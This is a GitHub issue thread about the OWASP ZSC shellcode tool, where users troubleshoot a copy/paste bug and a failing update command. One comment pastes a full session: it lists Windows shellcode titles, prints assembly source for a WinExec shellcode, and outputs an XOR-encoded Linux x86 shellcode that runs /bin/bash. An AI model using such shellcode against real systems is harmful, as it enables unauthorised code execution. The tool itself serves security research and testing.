
Comments (5)

iNoSec commented on June 24, 2024

My bad, that's simple: the copy/paste is what makes the bug. If I type the command, not like a big fat ass, that works. Can close this issue.


iNoSec commented on June 24, 2024

Just update doesn't work.


Ali-Razmjoo commented on June 24, 2024

works fine for me!


  ______          __      _____ _____    ______ _____  _____
 / __ \ \        / /\    / ____|  __ \  |___  // ____|/ ____|
| |  | \ \  /\  / /  \  | (___ | |__) |    / /| (___ | |
| |  | |\ \/  \/ / /\ \  \___ \|  ___/    / /  \___ \| |
| |__| | \  /\  / ____ \ ____) | |       / /__ ____) | |____
 \____/   \/  \/_/    \_\_____/|_|      /_____|_____/ \_____|


                OWASP ZeroDay Cyber Research Shellcoder

zsc> shellcode
zsc/shellcode>
download         generate         search           shell_storm_list
zsc/shellcode> search
keyword_to_search>
download         generate         search           shell_storm_list
keyword_to_search> winexec
[+] author: DATA_SNIPER shellcode_id: 148       platform: Windows       title: telnetbind by winexec - 111 bytes
[+] author: Lord Kelvin shellcode_id: 581       platform: Windows       title: XP sp3 (Ru) WinExec+ExitProcess cmd shellcode - 12 bytes
[+] author: RubberDuck  shellcode_id: 766       platform: Windows       title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 272 bytes
[+] author: RubberDuck  shellcode_id: 662       platform: Windows       title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
[+] author: Weiss       shellcode_id: 391       platform: Windows       title: WinExec() Command Parameter - 104 bytes

zsc> shellcode
zsc/shellcode> download
shellcode_id> 391

;
; relocateable dynamic runtime assembly code example using hash lookup
;
; WinExec() with ExitThread()
; 104 bytes
;
; for testing:
;
; ml /c /coff /Cp wexec2.asm
; link /subsystem:windows /section:.text,w wexec2.obj
;
; wyse101 [at] gmail.com
;
; October 2006
;
.386
.model flat,stdcall

ROL_CONSTANT equ 5

mrol macro iNum:req,iBits:req
   exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm

mror macro iNum:req,iBits:req
   exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm

hashapi macro szApi
   local dwApi

   dwApi = 0

   forc x,szApi
      dwApi = dwApi + '&x'
      dwApi = mrol(dwApi,ROL_CONSTANT)
   endm
   dwApi = mrol(dwApi,ROL_CONSTANT)
   dw (dwApi and 0ffffh)
endm

.code

   assume fs:nothing

code_start:
   jmp load_data
setup_parameters:
   pop ebp
   xor ecx,ecx
   push ecx                                 ; ExitThread() exitcode
   push ecx                                 ; SW_HIDE
   mov cl,(cmd_end-api_hashes)              ; limit of 255 bytes per command
   inc byte ptr[ebp+ecx]
   lea eax,[ebp+(cmd_string-api_hashes)]
   push eax                                 ; WinExec command string
get_k32_base:
   mov cl,30h
   mov eax,fs:[ecx]
   mov eax,[eax+0ch]
   mov esi,[eax+1ch]
   lodsd
   mov ebx,[eax+08h]
get_api_loop:
   mov eax,[ebx+3ch]
   mov eax,[ebx+eax+78h]
   lea esi,[ebx+eax+1ch]
   mov cl,3
load_rva:
   lodsd
   add eax,ebx
   push eax
   loop load_rva
   pop ebp
   pop edi
load_api:
   mov esi,[edi+4*ecx]
   add esi,ebx
   xor eax,eax
   cdq
hash_api:
   lodsb
   add edx,eax
   rol edx,ROL_CONSTANT
   dec eax
   jns hash_api
   inc ecx
   mov eax,[esp+4]
   cmp dx,word ptr[eax]
   jne load_api
   pop eax
   movzx edx,word ptr[ebp+2*ecx-2]
   add ebx,[eax+4*edx]
   pop esi
   call ebx
   lodsw
   jmp get_k32_base
load_data:
   call setup_parameters
api_hashes:
   hashapi <WinExec>
   hashapi <ExitThread>
code_end:

cmd_string db 'cmd /c echo hello,world>test.txt && notepad test.txt',0ffh
cmd_end equ $-1

end code_start





Shellcode output to a .c file?(y or n)> n
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> linux_x86
zsc/shellcode/generate/linux_x86>
chmod            download         exec             script_executor  write
dir_create       download_execute file_create      system
zsc/shellcode/generate/linux_x86> exec
zsc/shellcode/generate/linux_x86/exec> file_to_execute
file_to_execute> /bin/bash

[+] file_to_execute set to "/bin/bash"

[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all


[+] enter encode type
zsc/shellcode/generate/linux_x86/exec/encode_type> xo
xor_random    xor_yourvalue
zsc/shellcode/generate/linux_x86/exec/encode_type> xor_random

Output assembly code?(y or n)> n
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x6a\x4e\x58\x83\xf0\x08\x31\xdb\x31\xc9\xcd\x80\x68\x6a\x45\x48\x62\x5b\x68\xfa\xd5\xd8\x0a\x58\x31\xd8\x50\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x37\x31\x4e\x57\x5b\x68\x18\x53\x2f\x24\x58\x31\xd8\x50\x68\x5a\x38\x65\x4c\x5b\x68\x75\x5a\x0c\x22\x58\x31\xd8\x50\x89\xe3\x31\xc0\xb0\x0b\xcd\x80\xb0\x01\xb3\x01\xcd\x80

Shellcode output to a .c file?(y or n)> n
zsc> wrong input!
[!] interrupted by user!
Exit

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>python -V
Python 2.7.13

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>


Ali-Razmjoo commented on June 24, 2024

If you still have errors, please provide your OS, OS version, and Python version.


iNoSec commented on June 24, 2024

Like I said, I copied/pasted the commands, but when I type them, everything works; just the update command fails with a connection error. I can download shellcode from shellstorm, so I have no problem with my connection. I'm not on my PC now, but I will look at the update URL in the code tonight.
I'm on ParrotOS and I use Python 2.7 for OWASP ZSC (I will confirm tonight).
Thanks
